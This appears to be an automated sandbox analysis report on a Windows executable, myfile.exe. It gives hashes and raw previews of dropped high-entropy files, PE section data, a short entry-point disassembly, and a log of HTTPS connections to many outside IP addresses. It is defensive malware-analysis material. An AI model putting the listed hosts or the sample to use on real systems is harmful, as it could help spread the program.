                                                              Preview:.-....{..qo...U..J....T...FV....r..*.....t.m.d1QR.n..r....iAW.8...[......>.........S..:>...'L.).FI?......zk.v._;....w.1.!....1)..l.n+.SGl..+..A.].b....Ab..%..e`c.Tq..y...H..s......3;.lQ0.L. ..n.9..g(..)... =U..D.J.J.DO..ux.O.[Z(..p..3.>.?.Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X......^... .V.H.....hAa......Ji=.....O.Z..........H
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):476
                                                              Entropy (8bit):7.581591825515615
                                                              Encrypted:false
                                                              SSDEEP:12:czuVCOueyUPAAdaZLx/93flhvniloH4tMj+8SWD:czSuNAdcF9NhvnrMMjEWD
                                                              MD5:FF3492604282065970EF45A310B91FE1
                                                              SHA1:384BFC62AC6CCEBC9E6654927ADE28319C39BB43
                                                              SHA-256:40D2B467BD2CA46A0E9501DBEF25D1280576A8501F88E332FFF53F7A5DDEBE5A
                                                              SHA-512:A9DC2ACF43D81F3C4F6BDC0804353163B195DF5A230DDB76B1DE6C924406527A79BCDB1862E3A2A6A8C69BCA8740D2800C9ED3104206F17F9A2E8AB03E2D123C
                                                              Malicious:false
                                                              Preview:.4.y_.....\.`c.....%.\;f....5.?.C.\ ...U.{..Y.Pk,...O.....4X..(.".g..y.5.....]$d.I.gD.]...Y.F....dk...<-...n0...+..=.^....,e.Ck.G.@c....].......b...h.b..... ~2.;..9.K....T.t..OT...rN.j.D.K.?....gC.'..h.....~s.....L.#.f,.............vGUc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.A...Q=_[;...Z.H..9M.a.>I...&....X..j=Yj.......z..u.4......[.x.d.5...)..O.....+.....V.*3
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1087
                                                              Entropy (8bit):7.841500538889213
                                                              Encrypted:false
                                                              SSDEEP:24:PA75PYFom1zzw8cXOCQqulMnfetYDZs39qWObY4muqZ3eQbinrMMjKtljp:PA9YimCMCOMnfUYDWV0m1Z39IMoeBp
                                                              MD5:239DEB5D3BEB58CEF3E72F326F92EB84
                                                              SHA1:BD04BE3C0ACE8CFCFAFEB73577CC076582FBDF4B
                                                              SHA-256:B4B0AD4A427770FE3C1A5F6DA4D4C75D89C3BE67760F3721ABB7E8914FF9023E
                                                              SHA-512:D753F12BD355E5796D5EDDF0AECE044524FBD3BFAB0DE5247C31009EF34E70B8AB2CEEF735959D95B954053322C71021CA1108D0E828C174B9AB73E22DA2A321
                                                              Malicious:false
                                                              Preview:>....S5..z.kSc............uTx..c.9\.......`....V........W.#6......3 S<...`..i...^*.q6.^iO...jIDm.q3'...m..E.?..t.$...f./.D....}.....1.d..}..F..=.g..;.L.8."`;....EV0n@S..ruV.w.S.4......<g......M.. ....hP..i.).b;..x...p4....J.(%.s...0^$.....Aq..&.+.7_KHt..QLN.....:.....X.A@.8.+.4....U.a..}_MG....X.....NK;@......9.l..n.0i.%v.A\1.....w..TI...`o.d....1"..B..s%.S....3....vp..y?..........G......j....#."=<Cr2.![.. x..$.6. ../............t..e$F.L...`....<....<kgO....=50.y..#.w.. \BK..Hff..$..?+n.b.{P..f3..!.....m...7..0....8...(".+A..n...UQ...8..f.n....<DP...X..n.~...Q..n.._'.}.qI/x.d,qNl..4......J,.l....1I.9..nLy...)....l,v..F.....C%......}...+}...,.]..........Qk......\D.ZM..7..K..6G..G.._...M.ih!.qXp...u.TC7..v....*.$d...{s.%.fL..e..j...>.9....'4~..f..q...9k...b.[.5...9;....g.?.F..v........h.s...h.V. ....!..*.Uc.Z..I.....E8.E.d....TD...,..Z...v.'.bw4R.~.s....@.G.........-...x.mS..d/..)|..h<U...)..... .H7*mq9:.Z..[...d..#|\9M...`0i.}.S.P.....?.
                                                              Process:C:\Users\user\Desktop\myfile.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):1227
                                                              Entropy (8bit):7.850378289608763
                                                              Encrypted:false
                                                              SSDEEP:24:7459cJa6Uda7VkjxDy5guXm/sm0+QdnfGRlXw+5Aagp6ysVwhoPUAwt6Dh9nnrM2:7quCdhyOeOB0+QdfGRG+WZXoPUCMoV
                                                              MD5:42392924FBDC52D8856DDE802D996E74
                                                              SHA1:E752211AA57D7C270F45387E09CEAC1A3DBDE7D4
                                                              SHA-256:F558B3DBFF6534BCD80D124F57824409FFC8407DD98F2B96ECB014488EBDFDF2
                                                              SHA-512:720E0F0A99BCFD013C084DEBF396F9E7DF0AA11FD4B358240A6675FE00F8FF5F1B26AD1305B3B134254B7BACA27241AB416175BFB810F2CFC381595C56096877
                                                              Malicious:false
                                                              Preview:../k%*.6...v.....-..96.y....F....2.:.B;.x_...........h....6.&....Y.G.G...?..a-5...M.....w"..$.\..".1.C...RL..A.Lq..|.h..y....L..).$...N'it..u..FF.=......e...\.T....y.>..A.y...I..:.....C`.j.k...#.e..aL`5,#.o.@".....k........8x.....k.....t.v.IT%`..../Cit..cE.].OPv,f].........w.^.0..Rlc3n..D.rl.d.O1%..%.....4i.....Q$C.2M..A...9...$U..7.dT...@Xe.R[...q.b.G..i8..........:..-P..\.O..+.:.3.<...?.+Fl.op/..k.TR.:...).A..z..0.Z.[.2......Ye\../.<.-.r.......{ujT. .?.$...|....X....R|_.#.F.6.3..v.4.......x....j+6..9..].{9..B.3...]o..j.`.l.F.H..|..3.Q.....A..^.5....I..WF.).......S.....0.9..:bi~w..!~>./.w..@<$..$3.......o..&Nf..w./......nra.H.V.....ht?A....*.<..W.L...Y....w...s.....z...MuW..../..+#{.=.D.=....L..)....o.b...H....E.....T.Qz:J...U..:-.{ A.e......b..d3~..`....o.....x">..m....2.f.@.[...N.......X%.K.[...".T.~k..~.^...H....Xh..0f....s..L.f.1`F......Ho..V.*..<..E...P..%....9..S.....*......'D.l....`U......U.f.Ecf. ki*....g....l.]V...7...m.....S..rz'../.U
                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Entropy (8bit):6.321034985158156
                                                              TrID:
                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                              • DOS Executable Generic (2002/1) 0.02%
                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                              File name:myfile.exe
                                                              File size:164'864 bytes
                                                              MD5:aaca0b25fa85ab4507d3861697824343
                                                              SHA1:527c1dc2a340dd48652aec14a6316c7af0ff74c0
                                                              SHA256:6727edbb5d6abee908851a8c5fd7b4aca6d664634fdcdfc15e04502b960abbc5
                                                              SHA512:4c1982d2781b174b33375f57716c89a425e2660dd40484566e1c56af2f00a258c14022a7eda76278cdb530ce67adc5f74dfc010651deaa14165dd54fb1add6f2
                                                              SSDEEP:3072:Hp5SexkWi1Lbi4eTMlwDCnu/qfgh9zIeZGm:JvGWwbnWJ/RfI2G
                                                              TLSH:2BF3C0166E9001F7C9A742F1562B3FA7D2FEF939131515DF935088881F324D2BA2A63B
                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............{i..{i..{i..%l..{i..%j..{i."%m..{i."%k..{i.Rich.{i.........................PE..L...\w.\.............................6.....
                                                              Icon Hash:90cececece8e8eb0
                                                              Entrypoint:0x4036e6
                                                              Entrypoint Section:.text
                                                              Digitally signed:false
                                                              Imagebase:0x400000
                                                              Subsystem:windows gui
                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                              Time Stamp:0x5CFE775C [Mon Jun 10 15:29:32 2019 UTC]
                                                              TLS Callbacks:
                                                              CLR (.Net) Version:
                                                              OS Version Major:5
                                                              OS Version Minor:1
                                                              File Version Major:5
                                                              File Version Minor:1
                                                              Subsystem Version Major:5
                                                              Subsystem Version Minor:1
                                                              Import Hash:
                                                              Instruction
                                                              push 00000000h
                                                              call 00007FA388B5FD35h
                                                              push 00000000h
                                                              call 00007FA388B60580h
                                                              pop ecx
                                                              ret
                                                              push ebp
                                                              mov ebp, esp
                                                              sub esp, 2Ch
                                                              lea eax, dword ptr [ebp-2Ch]
                                                              push esi
                                                              push eax
                                                              push 00000018h
                                                              pop esi
                                                              push esi
                                                              push dword ptr [ebp+08h]
                                                              call dword ptr [0041CA20h]
                                                              test eax, eax
                                                              je 00007FA388B5FF16h
                                                              mov eax, dword ptr [ebp-1Ah]
                                                              imul eax, dword ptr [ebp-1Ch]
                                                              push ebx
                                                              push edi
                                                              xor edi, edi
                                                              inc edi
                                                              movzx eax, ax
                                                              cmp ax, di
                                                              jne 00007FA388B5FD86h
                                                              mov ebx, edi
                                                              jmp 00007FA388B5FDA8h
                                                              push 00000004h
                                                              pop ebx
                                                              cmp ax, bx
                                                              jbe 00007FA388B5FDA0h
                                                              push 00000008h
                                                              pop ebx
                                                              cmp ax, bx
                                                              jbe 00007FA388B5FD98h
                                                              push 00000010h
                                                              pop ebx
                                                              cmp ax, bx
                                                              jbe 00007FA388B5FD90h
                                                              cmp ax, si
                                                              jnbe 00007FA388B5FD88h
                                                              mov ebx, esi
                                                              push 00000028h
                                                              jmp 00007FA388B5FD93h
                                                              push 00000020h
                                                              pop ebx
                                                              mov eax, edi
                                                              mov cl, bl
                                                              shl eax, cl
                                                              lea eax, dword ptr [00000028h+eax*4]
                                                              push eax
                                                              push 00000040h
                                                              call dword ptr [0041CAE4h]
                                                              mov esi, eax
                                                              push 00000018h
                                                              mov dword ptr [esi], 00000028h
                                                              mov eax, dword ptr [ebp-28h]
                                                              mov dword ptr [esi+04h], eax
                                                              mov eax, dword ptr [ebp-24h]
                                                              mov dword ptr [esi+08h], eax
                                                              mov ax, word ptr [ebp-1Ch]
                                                              mov word ptr [esi+0Ch], ax
                                                              mov ax, word ptr [ebp-1Ah]
                                                              mov word ptr [esi+0Eh], ax
                                                              pop eax
                                                              cmp bx, ax
                                                              jnc 00007FA388B5FD89h
                                                              mov cl, bl
                                                              shl edi, cl
                                                              mov dword ptr [esi+20h], edi
                                                              mov eax, dword ptr [esi+04h]
                                                              xor edi, edi
                                                              add eax, 07h
                                                              movzx ecx, bx
                                                              cdq
                                                              and edx, 07h
                                                              mov dword ptr [esi+00h], edi
                                                              Programming Language:
                                                              • [ C ] VS2015 UPD3.1 build 24215
                                                              • [LNK] VS2015 UPD3.1 build 24215
                                                              NameVirtual AddressVirtual Size Is in Section
                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x2b0000x54c.reloc
                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                              .text0x10000xa2d40xa400afb8170e2fd3b98574bcfb851bb9185cFalse0.5701219512195121data6.557481301352053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                              .rdata0xc0000xf6500xf800cee02166b388e53d17575c562ec2bcb2False0.5037802419354839data6.439969289144318IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                              .data0x1c0000x179c0x16008e933246b6d820599829816668c48ed8False0.9351917613636364data7.688811274301435IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .s7bz0x1e0000xc8000xc8004e2a20f857eea27c82cffb20e0ed46a9False0.51802734375zlib compressed data5.096361715869261IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                              .reloc0x2b0000x54c0x6008e13393d944b9927f94e5ce4851f272dFalse0.7903645833333334data6.215323245776694IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Sep 9, 2024 12:07:03.720664024 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:03.720701933 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:03.720808983 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:03.724013090 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:03.724033117 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:04.475464106 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:04.475542068 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:04.477214098 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:04.477226019 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:04.477466106 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:04.521564007 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:04.522521019 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:04.522556067 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:04.522562027 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:05.222224951 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:05.222251892 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:05.222258091 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:05.222296953 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:05.222322941 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:05.222326994 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:05.222342014 CEST4434973735.215.83.253192.168.2.4
                                                              Sep 9, 2024 12:07:05.222353935 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:05.222383022 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:05.222407103 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:05.224014997 CEST49737443192.168.2.435.215.83.253
                                                              Sep 9, 2024 12:07:05.298185110 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:05.298212051 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:05.298290014 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:05.298654079 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:05.298666000 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:05.766753912 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:05.766841888 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:05.768389940 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:05.768397093 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:05.768634081 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:05.769913912 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:05.769929886 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:05.769934893 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.032847881 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.032907963 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.032934904 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.032962084 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.032977104 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:07.032984018 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.033005953 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.033019066 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:07.033029079 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.033050060 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:07.033056021 CEST44349738160.153.0.131192.168.2.4
                                                              Sep 9, 2024 12:07:07.033093929 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:07.033240080 CEST49738443192.168.2.4160.153.0.131
                                                              Sep 9, 2024 12:07:07.458796024 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:07.458842039 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:07.458945990 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:07.459263086 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:07.459276915 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:07.954047918 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:07.954130888 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:07.955549955 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:07.955557108 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:07.955763102 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:07.956795931 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:07.956820965 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:07.956826925 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:08.111113071 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:08.111156940 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:08.111223936 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:08.111366034 CEST49739443192.168.2.4185.58.213.84
                                                              Sep 9, 2024 12:07:08.111382961 CEST44349739185.58.213.84192.168.2.4
                                                              Sep 9, 2024 12:07:08.324687004 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:08.324724913 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:08.324851990 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:08.325182915 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:08.325195074 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.117798090 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.117873907 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.119261026 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.119268894 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.119477987 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.120599031 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.120613098 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.120619059 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.831238031 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.831257105 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.831295967 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.831389904 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.831410885 CEST4434974089.108.65.79192.168.2.4
                                                              Sep 9, 2024 12:07:09.831476927 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.831476927 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.831593990 CEST49740443192.168.2.489.108.65.79
                                                              Sep 9, 2024 12:07:09.912020922 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:09.912048101 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:09.912126064 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:09.912408113 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:09.912421942 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:10.861042976 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:10.861144066 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:10.862775087 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:10.862783909 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:10.862989902 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:10.864104033 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:10.864121914 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:10.864129066 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:11.849746943 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:11.849766970 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:11.849811077 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:11.849915028 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:11.849941015 CEST44349741217.160.0.18192.168.2.4
                                                              Sep 9, 2024 12:07:11.849982023 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:11.849996090 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:11.850138903 CEST49741443192.168.2.4217.160.0.18
                                                              Sep 9, 2024 12:07:12.103480101 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:12.103504896 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:12.103601933 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:12.103923082 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:12.103936911 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:12.774400949 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:12.774527073 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:12.776134014 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:12.776145935 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:12.776352882 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:12.777471066 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:12.777498960 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:12.777503967 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:13.566845894 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:13.566870928 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:13.566920996 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:13.567003965 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:13.567287922 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:13.568799973 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:13.568814039 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:13.568824053 CEST49742443192.168.2.4188.40.30.106
                                                              Sep 9, 2024 12:07:13.568829060 CEST44349742188.40.30.106192.168.2.4
                                                              Sep 9, 2024 12:07:13.616134882 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:13.616167068 CEST44349743138.201.61.68192.168.2.4
                                                              Sep 9, 2024 12:07:13.616336107 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:13.616669893 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:13.616681099 CEST44349743138.201.61.68192.168.2.4
                                                              Sep 9, 2024 12:07:14.335844040 CEST44349743138.201.61.68192.168.2.4
                                                              Sep 9, 2024 12:07:14.335933924 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:14.337578058 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:14.337588072 CEST44349743138.201.61.68192.168.2.4
                                                              Sep 9, 2024 12:07:14.337798119 CEST44349743138.201.61.68192.168.2.4
                                                              Sep 9, 2024 12:07:14.338946104 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:14.338963985 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:14.338969946 CEST44349743138.201.61.68192.168.2.4
                                                              Sep 9, 2024 12:07:14.885720015 CEST44349743138.201.61.68192.168.2.4
                                                              Sep 9, 2024 12:07:14.886010885 CEST49743443192.168.2.4138.201.61.68
                                                              Sep 9, 2024 12:07:14.923629999 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:14.923665047 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:14.923841000 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:14.924130917 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:14.924144030 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:15.638796091 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:15.639105082 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:15.640959978 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:15.640968084 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:15.641166925 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:15.642436981 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:15.642467976 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:15.642472029 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:16.326754093 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:16.327771902 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:16.327781916 CEST4434974489.116.147.189192.168.2.4
                                                              Sep 9, 2024 12:07:16.327855110 CEST49744443192.168.2.489.116.147.189
                                                              Sep 9, 2024 12:07:16.557254076 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:16.557297945 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:16.557368994 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:16.557749987 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:16.557761908 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.147686958 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.147775888 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:17.149261951 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:17.149271011 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.149475098 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.150542021 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:17.150569916 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:17.150574923 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.309017897 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.309093952 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.311045885 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:17.315303087 CEST49745443192.168.2.4208.73.140.70
                                                              Sep 9, 2024 12:07:17.315315008 CEST44349745208.73.140.70192.168.2.4
                                                              Sep 9, 2024 12:07:17.330198050 CEST49746443192.168.2.4208.73.140.70
